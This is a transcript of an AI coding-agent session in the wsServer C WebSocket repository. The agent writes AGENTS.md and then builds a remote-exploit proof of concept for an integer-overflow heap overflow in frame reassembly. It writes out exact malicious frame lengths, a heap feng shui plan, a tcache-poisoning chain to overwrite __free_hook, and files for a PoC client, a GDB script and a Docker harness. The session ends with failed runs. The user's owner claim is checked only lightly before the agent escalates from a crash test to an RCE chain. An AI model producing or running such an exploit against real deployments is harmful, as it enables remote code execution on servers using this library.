OpenCode

Create or update AGENTS.md

/home/lucas/Works/VibeCodedProjects/wsServer · 15/04/2026, 16:30:58 · 103107 files

Diffs

AGENTS.md
@@ -0,0 +1,112 @@
+# wsServer
+
+Tiny WebSocket server library in C99 (no external deps, only pthread).
+
+## Build
+
+```bash
+make # libws.a + examples (preferred on Linux)
+make examples # examples only
+make clean
tests/Dockerfile.poc
@@ -0,0 +1,39 @@
+FROM ubuntu:20.04
+
+ENV DEBIAN_FRONTEND=noninteractive
+
+RUN apt-get update && apt-get install -y \
+ gcc make gdb python3 libc6-dbg patch
+
+COPY . /wsServer
+WORKDIR /wsServer
+
tests/poc_echo.c
@@ -0,0 +1,113 @@
+/*
+ * poc_echo.c - Single-threaded echo server for RIP-control PoC
+ *
+ * Differences from examples/echo/echo.c:
+ * 1. Pre-populates tcache[0] with 3 free 32-byte chunks before
+ * accepting connections (heap feng shui).
+ * 2. onopen: on the 2nd connection, leaks one extra malloc(24)
+ * so that the echo round-trip pops 2 more entries, reaching
+ * the poisoned __free_hook address.
+ * 3. Must be built with poc_single_thread.patch applied to ws.c
tests/poc_gdb.txt
@@ -0,0 +1,112 @@
+# poc_gdb.txt — GDB helper script for wsServer RIP-control PoC
+#
+# Run: gdb -x tests/poc_gdb.txt ./tests/poc_echo
+#
+set disable-randomization on
+set pagination off
+
+start
+
+printf "\n=== LIBC ADDRESSES ===\n"
tests/poc_rip_control.c
@@ -0,0 +1,536 @@
+/*
+ * poc_rip_control.c - Integer-overflow heap overwrite PoC for wsServer
+ *
+ * Target vulnerability: read_single_frame() in src/ws.c
+ * Line 1453: *frame_size += fsd->frame_length (unchecked 64-bit add)
+ * Line 1505: realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin)
+ * Lines 1519-1527: write loop using original fsd->frame_length
+ *
+ * Exploit: two-frame message where frame 2 carries a 64-bit length
+ * that wraps *frame_size around the 2^64 boundary, defeating the
tests/poc_run.sh
@@ -0,0 +1,104 @@
+#!/usr/bin/env bash
+#
+# poc_run.sh — build Docker image, run the single-threaded PoC echo
+# server under GDB, then run the PoC client against it.
+#
+# Prerequisites: Docker, this script run from the wsServer root.
+#
+set -euo pipefail
+
+IMAGE="ws-poc"
tests/poc_single_thread.patch
@@ -0,0 +1,15 @@
+--- a/src/ws.c
++++ b/src/ws.c
+@@ -1900,11 +1900,7 @@
+ /* Client socket added to socks list ? */
+ if (i != MAX_CLIENTS)
+ {
+- if (pthread_create(
+- &client_thread, NULL, ws_establishconnection, &client_socks[i]))
+- panic("Could not create the client thread!");
+-
Create or update `AGENTS.md` for this repository.

The goal is a compact instruction file that helps future OpenCode sessions avoid mistakes and ramp up quickly. Every line should answer: "Would an agent likely miss this without help?" If not, leave it out.

User-provided focus or constraints (honor these):


## How to investigate

Read the highest-value sources first:
- `README*`, root manifests, workspace config, lockfiles
- build, test, lint, formatter, typecheck, and codegen config
- CI workflows and pre-commit / task runner config
- existing instruction files (`AGENTS.md`, `CLAUDE.md`, `.cursor/rules/`, `.cursorrules`, `.github/copilot-instructions.md`)
- repo-local OpenCode config such as `opencode.json`

If architecture is still unclear after reading config and docs, inspect a small number of representative code files to find the real entrypoints, package boundaries, and execution flow. Prefer reading the files that explain how the system is wired together over random leaf files.

Prefer executable sources of truth over prose. If docs conflict with config or scripts, trust the executable source and only keep what you can verify.

## What to extract

Look for the highest-signal facts for an agent working in this repo:
- exact developer commands, especially non-obvious ones
- how to run a single test, a single package, or a focused verification step
- required command order when it matters, such as `lint -> typecheck -> test`
- monorepo or multi-package boundaries, ownership of major directories, and the real app/library entrypoints
- framework or toolchain quirks: generated code, migrations, codegen, build artifacts, special env loading, dev servers, infra deploy flow
- repo-specific style or workflow conventions that differ from defaults
- testing quirks: fixtures, integration test prerequisites, snapshot workflows, required services, flaky or expensive suites
- important constraints from existing instruction files worth preserving

Good `AGENTS.md` content is usually hard-earned context that took reading multiple files to infer.

## Questions

Only ask the user questions if the repo cannot answer something important. Use the `question` tool for one short batch at most.

Good questions:
- undocumented team conventions
- branch / PR / release expectations
- missing setup or test prerequisites that are known but not written down

Do not ask about anything the repo already makes clear.

## Writing rules

Include only high-signal, repo-specific guidance such as:
- exact commands and shortcuts the agent would otherwise guess wrong
- architecture notes that are not obvious from filenames
- conventions that differ from language or framework defaults
- setup requirements, environment quirks, and operational gotchas
- references to existing instruction sources that matter

Exclude:
- generic software advice
- long tutorials or exhaustive file trees
- obvious language conventions
- speculative claims or anything you could not verify
- content better stored in another file referenced via `opencode.json` `instructions`

When in doubt, omit.

Prefer short sections and bullets. If the repo is simple, keep the file simple. If the repo is large, summarize the few structural facts that actually change how an agent should work.

If `AGENTS.md` already exists at `/home/lucas/Works/VibeCodedProjects/wsServer`, improve it in place rather than rewriting blindly. Preserve verified useful guidance, delete fluff or stale claims, and reconcile it with the current codebase.
zai-coding-plan
zai-coding-plan / glm-5.1
Step

I'll investigate the repository to understand its structure and conventions before proposing an AGENTS.md plan.


I now have a complete picture of the repository. Here's my plan for AGENTS.md:

Proposed AGENTS.md

The file would contain these sections:

Build

  • make — builds libws.a + examples (preferred on Linux)
  • CMake alternative: mkdir build && cd build && cmake .. && make
  • make examples — just examples
  • make clean — clean all artifacts

Tests

  • Tests require the Autobahn Testsuite (pip install autobahntestsuite) or Docker
  • Make: make tests (builds examples first, then runs Autobahn)
  • CMake: pass -DENABLE_WSSERVER_TEST=On to cmake, then ctest --verbose
  • make tests_check — validate results with validate_output.py
  • Fuzzing: AFL_FUZZ=yes make (requires AFL installed)

Coding Style (non-obvious, repo-specific)

  • Tabs (width 4), Allman braces, 85-col limit
  • C89-style comments only (/* ... */), never //
  • Doxygen for all functions/structs
  • No typedefs except for opaque types
  • Lowercase + underscores for functions/variables; uppercase for macros
  • Variables declared at top of scope
  • .clang-format present — use clang-format -style=file -i <file> but review output manually (it doesn't cover everything)

Architecture

  • src/ — library core (ws.c, handshake.c, sha1.c, base64.c, utf8.c)
  • include/ws.h — single public API header
  • examples/ — echo, ping, vtouchpad
  • extra/toyws/ — companion WS client (not a general-purpose client)
  • tests/ — Autobahn conformance + AFL fuzzing
  • No external dependencies; C99 + pthread only
  • Compile-time flag VALIDATE_UTF8 (default on) controls UTF-8 validation

PR Conventions

  • Small/trivial PRs (< 30 LOC): OK without an issue
  • Non-trivial changes: create an issue first

This captures what an agent would likely get wrong: the C89 comment requirement, the Allman brace style, the tab indentation, the test prerequisites (Autobahn), the fuzzing workflow, and the PR issue-first convention.

Does this look right, or would you like me to adjust anything before writing it?

Looks good, write the file.
zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Done. AGENTS.md has been written at the repository root.

Ok so I'm one of the creators of this program; we found a security vulnerability, but in order to fix it we need a unit test for regression testing. So for that, we need to make an exploration PoC.

Here is the vulnerability summary — give it a read, read the repo, and ask questions if you need. After that let me know, and I will tell you how we can proceed.

# Security issue: integer-overflow heap overwrite in frame reassembly

## Summary
A remote WebSocket client can trigger a heap buffer overflow by sending a fragmented message sequence with a large 64-bit payload length in a continuation frame.

The vulnerable logic is in `read_single_frame()` (`src/ws.c`):
- cumulative frame size is updated with unchecked 64-bit addition (`*frame_size += fsd->frame_length`),
- allocation size is computed with unchecked 64-bit addition (`realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin)`),
- then the code writes `fsd->frame_length` bytes into that potentially undersized buffer.

Because unsigned overflow wraps in C, an attacker can make the allocation size small while still entering a very large write loop.

## Impact
- Remote crash (heap corruption / SIGSEGV) is straightforward.
- Depending on allocator/runtime hardening, this may be exploitable for remote code execution.

## Exploit sketch
1. Send an initial non-FIN text frame with small payload (e.g., 16 bytes) to set `msg_idx_data`.
2. Send a FIN continuation frame with 64-bit payload length close to `UINT64_MAX`.
3. The allocation-size expression wraps to a tiny size.
4. Stream arbitrary masked payload bytes; each byte is written past the allocated heap chunk.

This is remotely reachable from any TCP peer that can complete the WebSocket handshake.

## Recommended fix direction
- Before any addition involving lengths, use checked arithmetic and reject on overflow.
- Validate both:
  - cumulative message size (`*frame_size + fsd->frame_length`), and
  - allocation size (`*msg_idx + fsd->frame_length + fsd->is_fin`).
- On overflow/protocol violation, close with status code `1009` (message too big) or `1002` (protocol error).




I've thoroughly read the vulnerable code. Here's my analysis:

Confirmed Vulnerability Path

The bug is in read_single_frame() (src/ws.c:1410-1552), specifically:

  1. Line 1453: *frame_size += fsd->frame_length; — unchecked 64-bit addition. When a first non-FIN fragment sets *frame_size to N, a second continuation fragment with frame_length close to UINT64_MAX wraps the sum to a small value.

  2. Line 1463: if (*frame_size > MAX_FRAME_LENGTH) — this check is defeated because the wrapped value is tiny.

  3. Line 1505: realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — the allocation size also wraps to a small number (e.g. ~6 bytes).

  4. Lines 1519-1527 — the write loop uses the original (huge) fsd->frame_length, writing past the heap chunk.

PoC Attack Sketch

  1. Valid HTTP upgrade handshake
  2. Non-FIN text frame with 16 bytes payload (sets msg_idx_data = 16, frame_size = 16)
  3. FIN continuation frame with frame_length = UINT64_MAX - 10 — the allocation wraps to 6 bytes, the check passes, then the loop tries to write UINT64_MAX - 10 bytes into that 6-byte buffer.

Approach Options for the PoC/Regression Test

Question · PoC approach · 1 answered

How should we build the PoC and regression test? The existing fuzzing harness (ws_file) reads crafted binary files through the parser — but I notice ws_file() at line 2078 references a cli_events variable that doesn't appear to exist in the current code (looks like a leftover from the ws_events refactor to ws_server). Which approach do you prefer?

Fix ws_file + file-based PoC
Fix the cli_events issue in ws_file(), write a C program that crafts a binary file (handshake + malicious frames) and feeds it through ws_file(). Integrates with existing fuzzing infra.
Network-based PoC
Write a standalone C/Python program that connects to a live wsServer instance, completes the handshake over TCP, then sends the malicious fragment sequence. More realistic but harder to automate as a unit test.
New standalone test harness
Write a new self-contained C test program that bypasses ws_file, directly sets up a ws_connection with a pipe/memfd containing the crafted frames, and calls the parsing loop. No AFL dependency.

Good, network-based it is. Here's my plan:

Network-based PoC Plan

What it does: A standalone C program that connects to a running wsServer instance (e.g. the echo example), completes the handshake, then sends a malicious two-frame sequence that triggers the integer overflow in read_single_frame().

Frame sequence:

| Frame | FIN | Opcode             | Payload Length                       | Purpose                             |
| ----- | --- | ------------------ | ------------------------------------ | ----------------------------------- |
| 1     | 0   | text (0x1)         | 16 bytes                             | Sets msg_idx_data=16, frame_size=16 |
| 2     | 1   | continuation (0x0) | 0xFFFFFFFFFFFFFFF5 (UINT64_MAX - 10) | Triggers overflow                   |

Both frames are masked (server expects it — reads 4 mask bytes unconditionally at ws.c:1475-1478). Mask key = {0,0,0,0} for simplicity.

Why it crashes:

  • *frame_size += fsd->frame_length → 16 + 0xFFFFFFFFFFFFFFF5 wraps to 0x05, passes the MAX_FRAME_LENGTH check at line 1463
  • realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) → 16 + 0xFFFFFFFFFFFFFFF5 + 1 wraps to 0x06 — allocates ~6 bytes
  • The write loop at lines 1519-1527 tries to write 0xFFFFFFFFFFFFFFF5 bytes starting at msg[16] — immediate heap corruption on the first write past the 6-byte buffer

Program structure:

  1. connect_to_server(host, port) — TCP connect with host resolution
  2. do_handshake(sock) — send HTTP upgrade, read response
  3. send_exploit(sock) — send the two crafted frames + a small burst of payload bytes (just needs a few hundred bytes to corrupt past the tiny allocation, no need to send anywhere near the declared length)
  4. The server should crash (SIGSEGV or heap corruption) during frame reassembly

File location: tests/poc_overflow.c

I'm ready when you are — let me know if you want any adjustments to this plan before I start writing.

Ok so your objective is to prove we can manipulate the RIP register. For that we will need to build a version with all protections disabled (ASLR, canary, etc.) - so sketch a plan for how to make that PoC.

Good. To prove RIP control, we need to chain the heap overflow into an arbitrary write primitive and then hijack control flow. Here's my plan:


Plan: RIP Control PoC

Phase 1: Build Infrastructure

Unprotected server build — new Makefile target that compiles the echo example with all mitigations off:

CFLAGS: -g -O0 -fno-stack-protector -fno-pie -D_FORTIFY_SOURCE=0
LDFLAGS: -no-pie -z norelro -z execstack

Disable ASLR:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Phase 2: PoC Client (tests/poc_rip_control.c)

A standalone C program that acts as a WebSocket client:

  1. Connect to host:port (default 127.0.0.1:8080)
  2. Handshake — send valid HTTP Upgrade, read 101 response
  3. Frame 1 — non-FIN text, 16 bytes payload, mask={0,0,0,0} (sets msg_idx=16, frame_size=16)
  4. Frame 2 — FIN continuation, declared length 0xFFFFFFFFFFFFFFF5, mask={0,0,0,0} (triggers the realloc wrap to ~6 bytes)
  5. Overflow payload — send crafted bytes starting at offset 16 past the undersized buffer. Two modes:
    • Crash mode: send 0x41 (A) bytes to demonstrate heap corruption → SIGSEGV
    • RIP mode: send a tailored payload at specific offsets to hit the exploitation target

Phase 3: Heap Reconnaissance (GDB)

This step is critical — we need to discover the exact heap layout before crafting the RIP-mode payload:

  1. Run the unprotected server under GDB
  2. Set breakpoint after the realloc at ws.c:1505 (after the wrap)
  3. Connect with the PoC in crash mode
  4. Examine:
    • p msg — our buffer address
    • x/40gx msg-16 — full chunk + adjacent chunks
    • info proc mappings — heap base, libc base, binary base
    • p &__free_hook — target address in libc
  5. Determine: what chunk lies after msg, what's in it, and whether there are free chunks we can corrupt

Phase 4: Exploit Strategy (depends on glibc version)

Most likely path — fastbin/tcache poisoning → __free_hook overwrite:

  1. The overflow writes past our msg chunk into the next chunk's fd pointer (if it's a free chunk) or corrupts its size field
  2. We forge a fake free chunk whose fd points to __free_hook - 0x10
  3. A subsequent malloc() returns a pointer to __free_hook
  4. We write our sentinel address (e.g., 0x4141414141414141) there
  5. When free(msg) is called at ws.c:1713, glibc calls __free_hook → RIP = 0x4141414141414141

Alternative path — corrupt an adjacent allocated chunk's data: If there's a heap-allocated struct with a function pointer adjacent to msg, we can directly overwrite it. Candidate: ws_prm (allocated at server start, contains ws_server with event callbacks). Whether it's adjacent depends on Phase 3 findings.

Phase 5: Demonstrate RIP Control

$ gdb ./echo_unprotected
(gdb) run
# In another terminal:
$ ./poc_rip_control --mode rip

# GDB output:
# Program received signal SIGSEGV, Segmentation fault.
# 0x0000000041414141 in ?? ()

Seeing RIP = 0x4141414141414141 proves full control.

Deliverables

| File                    | Purpose                                         |
| ----------------------- | ----------------------------------------------- |
| tests/poc_rip_control.c | PoC client (connect, handshake, exploit)        |
| tests/Makefile.poc      | Build rules for unprotected server + PoC binary |
| tests/poc_gdb.txt       | GDB script for heap reconnaissance              |

One question before we proceed:

Question · glibc version · 1 answered

What glibc version is on the target system? This determines which heap exploitation technique works (tcache poisoning, fastbin dup, etc.) and whether __free_hook is available.

Don't know, check at runtime
I'll detect the glibc version in the PoC and adapt the exploit strategy accordingly
glibc < 2.26
No tcache — fastbin/unsorted bin attacks
glibc 2.26 - 2.33
Tcache enabled but no key validation — simple tcache poisoning
glibc >= 2.34
__free_hook removed — need a different target (e.g., GOT overwrite, or FSOP via forged IO_FILE vtables)
Check glibc version
$ ldd --version 2>&1 | head -1
ldd (Ubuntu GLIBC 2.39-0ubuntu8.7) 2.39

glibc 2.39 — __free_hook was removed in 2.34 and safe-linking is active. That rules out the classic approach. Let me check what Docker base gives us the best target.

Check available Docker images
$ docker images 2>/dev/null | head -20 || echo "Docker not available or not running"
IMAGE                                           ID             DISK USAGE   CONTENT SIZE   EXTRA
mcr.microsoft.com/presidio-analyzer:2.2.360     248a5fb234ed       1.54GB             0B   U    
mcr.microsoft.com/presidio-anonymizer:2.2.360   97ebe789db35        249MB             0B   U    
mongo:latest                                    b6fc3eda4f9a        950MB             0B   U    
mysql:8                                         02ffa1ed2ee9        790MB             0B   U    
opencode-share-server-share-server:latest       f84b5a0bc10b       29.1MB             0B   U    
postgres:16-alpine                              108b27c919e6        276MB             0B        
postgres:17                                     3fe059c96160        453MB             0B   U    
redis:7-alpine                                  aa189b5a1954       41.4MB             0B        
testcontainers/ryuk:0.13.0                      b75bc7ce94c3        7.2MB             0B        

Docker is available. Here's my revised plan given glibc 2.39 on the host:


Plan: RIP Control PoC

Why not glibc 2.39 directly

glibc 2.39 has no __free_hook, and it does have safe-linking (pointer mangling) and tcache key validation. Exploitation is possible (House of Apple 2, etc.) but requires forging IO_FILE structures — ~200+ lines of delicate glibc-internal manipulation that's fragile across point releases. Not worth it for a PoC.

Target environment: Docker (Ubuntu 20.04, glibc 2.31)

glibc 2.31 has __free_hook, tcache without safe-linking, no key validation. Classic tcache poisoning works cleanly.

Deliverables

| File                    | Purpose                                                                        |
| ----------------------- | ------------------------------------------------------------------------------ |
| tests/poc_rip_control.c | PoC client — connects, handshakes, triggers overflow, demonstrates RIP control |
| tests/Dockerfile.poc    | Ubuntu 20.04 build environment with unprotected server + GDB                   |
| tests/poc_run.sh        | Orchestrator: builds Docker image, runs server under GDB, runs PoC             |
| tests/poc_gdb.txt       | GDB script: heap reconnaissance + verify RIP after crash                       |

Exploitation Strategy: tcache poisoning → __free_hook → RIP

The wsServer message processing loop gives us alloc/free cycles we can use for heap shaping:

ws_establishconnection():
  while (next_complete_frame() >= 0) {
      onmessage(client_id, msg, frame_size, type);  // echo calls ws_sendframe_bcast
      free(msg);                                      // msg freed each iteration
  }

Each complete message: malloc(msg) → onmessage → malloc(response) → send → free(response) → free(msg).

Step-by-step:

  1. Connect + handshake — standard WebSocket upgrade.

  2. Heap shaping — send 6-7 complete text messages of a specific size S (e.g., 0x100 bytes). Each cycle: malloc(S) → malloc(response) → free(response) → free(S). This populates the tcache bin for size S with free chunks. We need to fill the tcache (7 entries for glibc 2.31) so subsequent frees go to the unsorted bin.

  3. Prepare the target chunk — send a message of size S, which gets freed into the now-full tcache (actually goes to fastbin or unsorted bin). Then send another message of size S — this allocation reuses a tcache entry, leaving a free chunk adjacent to where our exploit msg will land.

  4. Exploit message (two frames):

    • Frame 1: non-FIN text, 16 bytes → realloc(NULL, 16) = malloc(16) → allocates msg
    • Frame 2: FIN continuation, length = 0xFFFFFFFFFFFFFFF5 → realloc(msg, 6) (wrap) → same pointer (min chunk is 32 bytes), then the overflow loop writes past msg into the adjacent free chunk
    • Overflow payload: padding to reach the adjacent free chunk's fd pointer, then overwrite it with the address of __free_hook
  5. Trigger — after the overflow, next_byte() returns -1, function returns. Back in ws_establishconnection:

    • onmessage is called with the corrupted msg → ws_sendframe_bcast() → allocates a response buffer of size S → malloc returns __free_hook (from the poisoned tcache)
    • The response data is written to __free_hook — this includes parts of our msg payload (controlled data from frame 1)
    • Actually, the response size depends on the (wrapped) frame_size, which is tiny. We need the allocation to match the poisoned bin size.
    • Alternative trigger: free(msg) is called after onmessage returns. If msg's chunk was also corrupted, this could trigger exploitation.
  6. Demonstrate RIP control — __free_hook now contains 0x4141414141414141. The next free() call jumps there. GDB confirms: RIP = 0x4141414141414141.

Heap shaping details (refined during Phase 3)

The exact number of shaping messages, the size S, and the offset to the target chunk's fd pointer will be determined empirically:

  • Run the server under GDB in the Docker container
  • Send shaping messages, breakpoint after free(msg), examine tcache: p *(struct tcache_perthread_struct *)tcache
  • Send the exploit, breakpoint after overflow, verify the fd corruption
  • Verify the malloc from poisoned tcache returns __free_hook

Build flags (inside Docker)

gcc -g -O0 -fno-stack-protector -fno-pie -D_FORTIFY_SOURCE=0 \
    -z norelro -z execstack -no-pie \
    src/ws.c src/base64.c src/sha1.c src/handshake.c src/utf8.c \
    examples/echo/echo.c -I include -pthread -o echo_unprotected

ASLR disabled: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

PoC client interface

./poc_rip_control [--host HOST] [--port PORT] [--shaping-count N] \
                  [--shaping-size S] [--target-addr ADDR]

Parameters are configurable so the exact values can be tuned after heap reconnaissance.


Does this plan look right? If so I'll start building the deliverables.


Goal

Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The ultimate goal is a regression test, but the immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled.

Instructions

  • The PoC must be network-based (connects to a running wsServer instance over TCP, not file-based via ws_file).
  • The server must be built with all protections disabled: no ASLR, no PIE, no stack canary, no RELRO, no NX, no FORTIFY_SOURCE.
  • The target environment is a Docker container running Ubuntu 20.04 (glibc 2.31) because the host system has glibc 2.39 (which removed __free_hook, has safe-linking, and tcache key validation — too complex for a PoC).
  • The exploitation strategy is tcache poisoning → __free_hook overwrite → RIP control.
  • The PoC client should be configurable (host, port, shaping count, shaping size, target address) so values can be tuned after heap reconnaissance.
  • Follow the repo's coding style: tabs, Allman braces, 85-col limit, C89 comments only (/* */), Doxygen for functions/structs.
  • Honor existing AGENTS.md conventions.

Discoveries

Vulnerability Details (confirmed by code review)

  • Location: read_single_frame() in src/ws.c:1410-1552
  • Line 1453: *frame_size += fsd->frame_length — unchecked 64-bit addition, wraps around
  • Line 1463: if (*frame_size > MAX_FRAME_LENGTH) — check is defeated by the wrapped small value
  • Line 1505: realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — allocation size also wraps to ~6 bytes
  • Lines 1519-1527: write loop uses original (huge) fsd->frame_length, writing past the undersized buffer

Exploit Arithmetic

  • Frame 1: non-FIN text, 16 bytes → sets msg_idx=16, frame_size=16
  • Frame 2: FIN continuation, frame_length = 0xFFFFFFFFFFFFFFF5 (UINT64_MAX-10)
  • *frame_size += frame_length → 16 + 0xFFF...F5 wraps to 5 → passes MAX_FRAME_LENGTH check
  • realloc(msg, 16 + 0xFFF...F5 + 1) wraps to 6 → tiny allocation
  • Write loop starts at msg[16], writing far past the 6-byte buffer → heap corruption

Heap Shaping Opportunity

The ws_establishconnection() loop (ws.c:1752-1782) gives us alloc/free cycles per message:

malloc(msg) → onmessage → ws_sendframe_bcast (malloc response) → send → free(response) → free(msg)

This allows heap feng shui: send complete messages of size S to populate tcache bins (7 entries on glibc 2.31), then overflow into an adjacent free chunk's fd pointer.

ws_file() Bug (noted but not our problem)

ws_file() at ws.c:2078 references cli_events which doesn't exist in the current code — a leftover from the ws_events → ws_server refactor. Not relevant to our network-based PoC.

Host glibc

ldd --version → glibc 2.39. Docker is available on the system.

Server Frame Expectations

  • Server reads 4 mask bytes unconditionally (ws.c:1475-1478) — all client frames MUST have MASK bit set
  • Control frames must be FIN and ≤125 bytes (ws.c:1655-1662)
  • Frame format: byte0 (FIN+RSV+opcode), byte1 (MASK+length), optional extended length, 4-byte mask, payload

Accomplished

  1. Created AGENTS.md at repo root — compact instruction file for future agent sessions
  2. Analyzed the vulnerability — confirmed the integer overflow path, traced exact line numbers, computed exploit arithmetic
  3. Chose PoC approach — network-based (user decision over file-based or standalone harness)
  4. Chose target environment — Docker Ubuntu 20.04 (glibc 2.31) due to host glibc 2.39 being too hardened
  5. Developed exploitation plan — tcache poisoning → __free_hook overwrite → RIP control, with heap shaping via preparatory messages

NOT YET DONE (next steps):

  • Write tests/poc_rip_control.c — the PoC client (connect, handshake, heap shaping messages, exploit two-frame sequence, configurable payload)
  • Write tests/Dockerfile.poc — Ubuntu 20.04 image with gcc, gdb, build the unprotected echo server
  • Write tests/poc_run.sh — orchestration script (build Docker, run server under GDB, run PoC)
  • Write tests/poc_gdb.txt — GDB helper script for heap reconnaissance and RIP verification
  • Perform heap reconnaissance in Docker to determine exact shaping size S, message count, and fd pointer offset
  • Tune the PoC parameters based on reconnaissance
  • Demonstrate RIP = 0x4141414141414141 under GDB

Relevant files / directories

Created

  • AGENTS.md — repo instruction file (completed)

To be created

  • tests/poc_rip_control.c — PoC client
  • tests/Dockerfile.poc — Docker build environment
  • tests/poc_run.sh — orchestration script
  • tests/poc_gdb.txt — GDB helper script

Key existing files read

  • src/ws.c — the vulnerable file, especially lines 1410-1552 (read_single_frame), 1565-1720 (next_complete_frame), 1735-1808 (ws_establishconnection), 2051-2101 (ws_file)
  • include/ws.h — public API, struct definitions (ws_server, ws_events, ws_frame_data), constants (MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8)
  • examples/echo/echo.c — target server binary, uses ws_sendframe_bcast in onmessage
  • tests/fuzzy/ws_file.c — existing AFL fuzz harness (not used, but informed approach)
  • Makefile — build system, AFL_FUZZ=yes option, CFLAGS
  • CMakeLists.txt — alternative build, ENABLE_WSSERVER_TEST option
  • .github/workflows/c-cpp.yml — CI config
  • doc/CODING_STYLE.md — coding conventions
  • .clang-format — formatter config (Microsoft-based, tabs, 85-col)
Ok, so let's do the work then!
Creating plan
Create tests/Dockerfile.poc — Ubuntu 20.04 build environment
Create tests/poc_rip_control.c — PoC client (connect, handshake, heap shape, overflow)
Create tests/poc_gdb.txt — GDB helper script for heap recon + RIP verification
Create tests/poc_run.sh — orchestration script (build Docker, run server, run PoC)
Build Docker image and do initial heap reconnaissance
Tune PoC parameters based on recon
Demonstrate RIP control under GDB

Let me also check the internal structures and frame reading logic:


Now let me check the Makefile to understand the build flags, and also check how the ws_sendframe_bcast function allocates memory (for heap shaping analysis):


Let me look at how the server accept loop works and if there are any malloc calls in the main loop path:


Now I have a complete understanding of the codebase. Let me create all four files.


Now the main PoC client:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c
Edit applied successfully.

LSP errors detected in this file, please fix:
<diagnostics file="/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c">
ERROR [425:4] Call to undeclared function 'usleep'; ISO C99 and later do not support implicit function declarations (fix available)

poc_rip_control.c:425:4: note: did you mean 'sleep'?
ERROR [510:2] Call to undeclared function 'usleep'; ISO C99 and later do not support implicit function declarations
</diagnostics>

The _DEFAULT_SOURCE needs to be defined before any system headers. Let me fix this:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c
Edit applied successfully.

Now the GDB helper script:


Now the orchestration script:

Make poc_run.sh executable
$ chmod +x /home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_run.sh

Now let me compile the PoC client locally to check for errors, then build the Docker image:

Compile PoC client to check for errors
$ gcc -Wall -Wextra -std=c99 -o /dev/null /home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_rip_control.c 2>&1

Clean compile. Now let's build the Docker image:

Build Docker image with unprotected echo server
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 925B done
#1 DONE 0.0s

#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 ...

#3 [auth] library/ubuntu:pull token for registry-1.docker.io

DNS resolution failure in Docker build. Let me check the network and try again:

Bash
$ docker network inspect bridge 2>/dev/null | head -20; echo "---"; cat /etc/resolv.conf | head -5
The user rejected permission to use this specific tool call.
Ok try again, I restarted docker.
Build Docker image with unprotected echo server
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1
#0 building with "default" instance using docker driver

#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 925B done
#1 DONE 0.0s

#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 ...

#3 [auth] library/ubuntu:pull token for registry-1.docker.io

Build succeeded. Now let's do the initial reconnaissance run — launch the server under GDB and fire the PoC:

Start server container in background
$ docker rm -f ws-poc-server 2>/dev/null; docker run -d --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt -ex "set pagination off" ./examples/echo/echo 2>&1' > /tmp/poc_gdb_out.txt 2>&1; echo "Container started, PID=$!"
Container started, PID=0
Run PoC client with minimal overflow
$ sleep 3 && docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
Error response from daemon: container 80e7753bf22e3fee85f7fada2022124d9ed5529a3e0270a562c4ba836630aaea is not running

Container exited already. Let's check the output:

Check GDB output from server
$ cat /tmp/poc_gdb_out.txt
80e7753bf22e3fee85f7fada2022124d9ed5529a3e0270a562c4ba836630aaea
Check container logs
$ docker logs ws-poc-server 2>&1
tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.

The __free_hook symbol isn't available before the program runs. Let me fix the GDB script:

Edit/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
/home/lucas/Works/VibeCodedProjects/wsServer/tests/poc_gdb.txt
Edit applied successfully.

Now let's run the auto mode — server in GDB + PoC fired automatically:

Run server under GDB and fire PoC
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo 2>&1' &
SERVER_PID=$!
sleep 4
echo "=== Running PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 2
echo "=== GDB Output ==="
wait $SERVER_PID 2>/dev/null
echo "=== Done ==="
ws-poc-server
tests/poc_gdb.txt:18: Error in sourced command file:
No symbol "__free_hook" in current context.
=== Running PoC ===
Error response from daemon: No such container: ws-poc-server
=== GDB Output ===
=== Done ===

The issue is GDB validates commands at definition time. Let me restructure the script:

you got froze, please continue
Run GDB server + PoC client
$ docker rm -f ws-poc-server 2>/dev/null; docker run --rm --name ws-poc-server --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -x tests/poc_gdb.txt ./examples/echo/echo 2>&1' > /tmp/poc_out.txt &
sleep 4
echo "=== Running PoC ==="
docker exec ws-poc-server ./tests/poc_rip_control -n 0 -f 16 -l 128 2>&1
sleep 3
echo "=== GDB Output ==="
wait 2>/dev/null
cat /tmp/poc_out.txt
=== Running PoC ===
Error response from daemon: No such container: ws-poc-server
=== GDB Output ===
